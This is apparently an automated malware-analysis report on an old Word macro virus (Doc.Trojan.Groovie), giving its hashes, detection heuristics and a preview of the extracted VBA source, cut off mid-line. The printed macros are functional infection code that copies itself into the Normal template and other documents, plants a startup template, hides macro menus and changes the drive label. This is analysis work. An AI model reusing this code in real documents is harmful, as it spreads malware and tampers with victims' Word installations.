Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 edab74933d2abcff…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 46.5 KB
Created: 1998-05-23 21:30:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 52ae4cea7be415491d94e048e6d947e7
SHA-1: bf8824bae27458c0c24c6551ffd8c8b269754196
SHA-256: edab74933d2abcff8df013a69b5095da8a0a33e25fc6111be194ae8b0384bdc5
Risk score: 360

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

This document contains legacy WordBasic markers and VBA macros, including AutoOpen and Auto_Close functions. The critical OLE_VBA_SHELL heuristic indicates the use of the Shell() function, which is likely used to download and execute a second-stage payload. ClamAV detections further confirm its malicious nature, identifying it as Doc.Trojan.Groovie-2.

Heuristics (7)

  • ClamAV: Doc.Trojan.Groovie-2 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Groovie-2
  • VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro (high, OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or ones where source extraction failed, so that visible VBA source is unavailable.
  • Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 25213 bytes
SHA-256: 18adc8840ffe84bd2222f6a2a0eb006746a1fc49568939526efb4b239b65ba59
Detection (ClamAV): Doc.Trojan.Groov-1
Obfuscation or payload: unlikely
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "groovie"
Public WhoAmI As String
Public DataDot As Boolean
Public NormInstalled As Boolean
Public DocInstalled As Boolean
Public NormReadOnly As Boolean
Public HoldDoc As String
Public DocThere As Boolean
Public Final_Close_Called As Boolean
Function ID_Status()
On Error Resume Next
    If MacroContainer = NormalTemplate Then
        WhoAmI = "normal"
        GoTo checkout
    End If
    If MacroContainer = ActiveDocument Then WhoAmI = "document"
    If MacroContainer = "data.dot" Then WhoAmI = "orbit"
checkout:
End Function
Function Install_Status()
On Error Resume Next
    If Dir(Application.StartupPath + "\data.dot") = "data.dot" Then DataDot = True
    For I = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(I).Name = "groovie" Then DocInstalled = True
    Next I
    For I = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(I).Name = "groovie" Then NormInstalled = True
    Next I
    If GetAttr(NormalTemplate.FullName) = vbArchive + vbReadOnly Or _
    GetAttr(NormalTemplate.FullName) = vbReadOnly Then NormReadOnly = True
End Function
Function The_Groovie_Core()
On Error Resume Next
Call ID_Status
Call Install_Status
    If WhoAmI = "document" Then Call DocCodeCore
    If WhoAmI = "normal" Then Call NormCodeCore
    If WhoAmI = "orbit" Then Call OrbitCoreCode
    If NormReadOnly = False Then CommandBars("tools").Controls("Macro").Delete
    If NormReadOnly = False Then CommandBars("tools").Controls("Templates and add-ins...").Delete
End Function
Function DocCodeCore()
On Error Resume Next
    Application.VBE.ActiveVBProject.VBComponents("groovie").Export "c:\groovie.sys"
    If NormInstalled = False And NormReadOnly = False Then
        With NormalTemplate.VBProject
        With .VBComponents.Import("c:\groovie.sys")
        End With
        End With
    End If
    If DataDot = False Then
        ActiveDocument.SaveAs FileName:=Application.StartupPath + "\data.dot", _
        FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
        Application.OrganizerRename Source:=Application.StartupPath + "\data.dot", Name:="groovie", NewName:="orbit", Object:=wdOrganizerObjectProjectItems
        ActiveDocument.SaveAs FileName:=Application.StartupPath + "\data.dot", _
        FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
        If ActiveDocument.Saved = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
        If Final_Close_Called = False Then Documents.Open FileName:=HoldDoc
        Shell ("label c: groovie"), 0
        Windows(1).Close
    End If
End Function
Function NormCodeCore()
On Error Resume Next
Application.ScreenUpdating = False
    Call Check_For_Doc
    If DocInstalled = False And DocThere = True Then
        With ActiveDocument.VBProject
        With .VBComponents.Import("c:\groovie.sys")
        End With
        End With
        With Dialogs(wdDialogFileSummaryInfo)
            .Comments = "ALT-F11 says it's groovie!"
            .Execute
        End With
    End If
    If DataDot = False And DocThere = True Then
        ActiveDocument.SaveAs FileName:=Application.StartupPath + "\data.dot", _
        FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
        Application.OrganizerRename Source:=Application.StartupPath + "\data.dot", Name:="groovie", NewName:="orbit", Object:=wdOrganizerObjectProjectItems
        ActiveDocument.SaveAs FileName:=Application.StartupPath + "\data.dot", _
        FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
        If Final_Close_Called = False Then Documents.Open FileName:=HoldDoc
        Win
... (truncated)